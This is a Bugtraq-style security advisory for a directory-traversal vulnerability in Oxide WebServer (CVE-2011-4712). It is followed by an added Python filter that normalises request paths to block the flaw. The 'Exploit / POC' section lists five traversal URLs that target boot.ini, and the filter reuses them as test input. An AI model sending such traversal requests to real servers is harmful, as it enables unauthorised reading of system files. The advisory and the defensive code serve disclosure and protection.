Oxide WebServer Directory Traversal Vulnerability
| Bugtraq ID: | 50845 |
| Class: | Input Validation Error |
| CVE: | CVE-2011-4712 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 29 2011 12:00AM |
| Updated: | Dec 13 2011 06:28PM |
| Credit: | demonalex |
| Vulnerable: | Oxide WebServer Oxide WebServer 0 |
| Not Vulnerable: | |
Discussion
Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
Exploit / POC
An attacker can exploit this issue with a web browser.
The following example URLs are available:
http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
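In the absence of a vendor patch, the request forms listed under Exploit / POC can be rejected by a filter in front of the server that normalizes the path before any file lookup. The following is an added example, not code from Oxide WebServer or from the original advisory; the document root `C:\oxide\www`, the benign URL and the function names are assumptions.

```python
import ntpath
from urllib.parse import unquote, urlsplit

# Assumption: hypothetical document root; the advisory does not name one.
DOCROOT = r"C:\oxide\www"

# The request forms listed in the advisory, then one constructed benign request.
ADVISORY_URLS = [
    r"http://www.example.com/..\..\..\boot.ini",
    r"http://www.example.com/..\\..\\..\\boot.ini",
    r"http://www.example.com/..\/..\/..\/boot.ini",
    r"http://www.example.com//..\/..\/..\boot.ini",
    r"http://www.example.com/.\..\.\..\.\..\boot.ini",
]
BENIGN_URL = "http://www.example.com/docs/../index.html"

def safe_relative_path(url):
    """Return the request path relative to the root, or None if it climbs above it."""
    # Decode first, then treat "\" exactly like "/" so every separator mix
    # collapses to the same segment list before any check is made.
    path = unquote(urlsplit(url).path).replace("\\", "/")
    stack = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue  # doubled separators and "." are no-ops
        if segment == "..":
            if not stack:
                return None  # would step above the document root
            stack.pop()
        elif ":" in segment or "\x00" in segment:
            return None  # drive letters, alternate data streams, NUL bytes
        else:
            stack.append(segment)
    return "/".join(stack)

def resolve(url, docroot=DOCROOT):
    """Map a URL to a file under docroot using Windows path rules, or None."""
    rel = safe_relative_path(url)
    if rel is None:
        return None
    root = ntpath.normpath(docroot)
    full = ntpath.normpath(ntpath.join(root, *rel.split("/")))
    # Second, independent check: the result must still sit under the root.
    if ntpath.commonpath([root, full]).lower() != root.lower():
        return None
    return full

if __name__ == "__main__":
    for u in ADVISORY_URLS + [BENIGN_URL]:
        print(f"{u} -> {resolve(u)}")
```

All five advisory forms resolve to `None`, while the benign request maps to a file under the document root.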